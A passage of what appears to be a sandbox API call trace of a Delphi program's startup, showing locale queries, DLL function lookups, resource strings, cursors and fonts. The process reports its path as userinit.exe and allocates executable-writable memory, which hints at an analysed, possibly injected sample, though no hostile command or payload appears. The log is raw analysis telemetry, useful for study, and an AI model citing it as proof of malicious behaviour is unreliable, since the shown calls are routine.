[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x14f64c, cchData=256 | out: lpLCData="October") returned 8
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Nov") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x14f64c, cchData=256 | out: lpLCData="November") returned 9
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Dec") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x14f64c, cchData=256 | out: lpLCData="December") returned 9
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Sun") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Sunday") returned 7
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Mon") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Monday") returned 7
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Tue") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Wed") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Thu") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Thursday") returned 9
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Fri") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Friday") returned 7
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Sat") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Saturday") returned 9
[0090.235] GetThreadLocale () returned 0x409
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="$") returned 2
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="0") returned 2
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="0") returned 2
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x14f7a0, cchData=2 | out: lpLCData=",") returned 2
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x14f7a0, cchData=2 | out: lpLCData=".") returned 2
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="2") returned 2
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x14f7a0, cchData=2 | out: lpLCData="/") returned 2
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0090.236] GetThreadLocale () returned 0x409
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x14f674, cchData=256 | out: lpLCData="1") returned 2
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0090.236] GetThreadLocale () returned 0x409
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x14f674, cchData=256 | out: lpLCData="1") returned 2
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x14f7a0, cchData=2 | out: lpLCData=":") returned 2
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="AM") returned 3
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="PM") returned 3
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="0") returned 2
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="0") returned 2
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x14f6a8, cchData=256 | out: lpLCData="0") returned 2
[0090.236] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x14f7a0, cchData=2 | out: lpLCData=",") returned 2
[0090.236] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0090.236] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0090.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0090.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0090.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0090.237] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0090.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0090.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0090.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0090.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0090.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0090.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0090.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0090.238] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0090.238] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0090.238] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0090.239] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0090.239] GetDC (hWnd=0x0) returned 0x2b010799
[0090.239] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0090.239] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.239] GetDC (hWnd=0x0) returned 0x2b010799
[0090.239] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0090.239] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.239] CreatePalette (plpal=0x14f404) returned 0x208086f
[0090.239] GetStockObject (i=7) returned 0x1b00017
[0090.239] GetStockObject (i=5) returned 0x1900015
[0090.239] GetStockObject (i=13) returned 0x18a002e
[0090.239] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0090.239] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff3d, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff3c, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff3b, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff3a, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff39, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff38, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff37, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff36, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff35, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff34, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff33, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff32, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff31, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff30, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff4f, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff4e, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff4d, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0090.240] LoadStringA (in: hInstance=0x2950000, uID=0xff4c, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0090.241] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0090.241] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0090.241] GetCurrentThreadId () returned 0xf54
[0090.241] GlobalAddAtomA (lpString="WndProcPtr0295000000000F54") returned 0xc152
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfefc, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfefb, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfefa, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef9, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef8, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef7, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef6, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef5, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef4, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef3, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef2, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef1, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xfef0, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xff0f, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xff0e, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xff0d, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0090.241] LoadStringA (in: hInstance=0x2950000, uID=0xff0c, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff0b, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff0a, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff09, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff08, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff07, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff06, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff05, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff04, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff03, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff02, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff01, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff00, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff1f, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff1e, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff1d, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff1c, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff1b, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff1a, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff19, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff18, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff17, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff16, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff15, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff14, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff13, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff12, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff11, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0090.242] LoadStringA (in: hInstance=0x2950000, uID=0xff10, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0090.243] LoadStringA (in: hInstance=0x2950000, uID=0xff2f, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0090.243] LoadStringA (in: hInstance=0x2950000, uID=0xff2e, lpBuffer=0x14f400, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0090.243] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0090.243] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0090.243] GetVersion () returned 0x1db10106
[0090.243] GetCurrentProcessId () returned 0xf50
[0090.243] GlobalAddAtomA (lpString="Delphi00000F50") returned 0xc158
[0090.243] GetCurrentThreadId () returned 0xf54
[0090.243] GlobalAddAtomA (lpString="ControlOfs0295000000000F54") returned 0xc151
[0090.243] RegisterClipboardFormatA (lpszFormat="ControlOfs0295000000000F54") returned 0xc163
[0090.243] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0090.243] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0090.243] GetSystemMetrics (nIndex=19) returned 1
[0090.243] GetSystemMetrics (nIndex=75) returned 1
[0090.243] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a71320, fWinIni=0x0 | out: pvParam=0x2a71320) returned 1
[0090.243] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0090.244] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0090.244] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ff9) returned 0x101e9
[0090.244] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0090.244] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0090.244] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0090.244] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffa) returned 0x101eb
[0090.244] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffb) returned 0x101ed
[0090.244] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffc) returned 0x101ef
[0090.245] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffd) returned 0x101f1
[0090.245] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7fff) returned 0x101f3
[0090.245] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffe) returned 0x101f5
[0090.245] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0090.245] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0090.245] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0090.245] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0090.245] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0090.246] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0090.246] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0090.246] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0090.246] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0090.246] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0090.246] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0090.246] GetDC (hWnd=0x0) returned 0x2b010799
[0090.246] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0090.246] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.246] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0090.246] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x29a9a60, dwData=0x2a7156c) returned 1
[0090.246] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x14f76b, fWinIni=0x0 | out: pvParam=0x14f76b) returned 1
[0090.246] CreateFontIndirectA (lplf=0x14f76b) returned 0xb0a0872
[0090.246] GetObjectA (in: h=0xb0a0872, c=60, pv=0x14f55c | out: pv=0x14f55c) returned 60
[0090.246] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x14f617, fWinIni=0x0 | out: pvParam=0x14f617) returned 1
[0090.247] CreateFontIndirectA (lplf=0x14f6f3) returned 0xa0a0870
[0090.247] GetObjectA (in: h=0xa0a0870, c=60, pv=0x14f55c | out: pv=0x14f55c) returned 60
[0090.247] CreateFontIndirectA (lplf=0x14f6b7) returned 0xa0a0871
[0090.247] GetObjectA (in: h=0xa0a0871, c=60, pv=0x14f55c | out: pv=0x14f55c) returned 60
[0090.247] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0090.247] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f6cb, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.247] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x14f6cb | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0090.247] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x220000
[0090.248] GetKeyboardLayoutList (in: nBuff=64, lpList=0x14f64c | out: lpList=0x14f64c) returned 1
[0090.249] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0090.249] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0090.250] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0090.250] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0090.250] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0090.250] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0090.250] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0090.250] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0090.250] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0090.250] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0090.250] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0090.250] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0090.251] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0090.251] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0090.251] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0090.251] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0090.251] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0090.251] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0090.251] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0090.251] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0090.251] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0090.251] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0090.252] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0090.252] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0090.252] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0090.252] LoadStringA (in: hInstance=0x2950000, uID=0xff59, lpBuffer=0x14f3ac, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0090.252] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0090.252] LoadStringA (in: hInstance=0x2950000, uID=0xff5a, lpBuffer=0x14f3ac, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0090.252] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0090.252] LoadStringA (in: hInstance=0x2950000, uID=0xff5b, lpBuffer=0x14f3ac, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0090.252] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0090.252] LoadStringA (in: hInstance=0x2950000, uID=0xff5c, lpBuffer=0x14f3ac, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0090.252] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0090.252] SetErrorMode (uMode=0x8000) returned 0x1
[0090.252] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6ceb0000
[0090.503] SetErrorMode (uMode=0x1) returned 0x8000
[0090.503] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePropertyFrame") returned 0x6ceb20ea
[0090.503] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreateFontIndirect") returned 0x6ceb20b7
[0090.503] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePictureIndirect") returned 0x6ceb20c8
[0090.503] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleLoadPicture") returned 0x6ceb20d9
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a3fa98*="EJwsclUnsupportedException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a3fa80*="EJwsclPIDException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a3fa68*="EJwsclJwShellExecuteException") returned 1
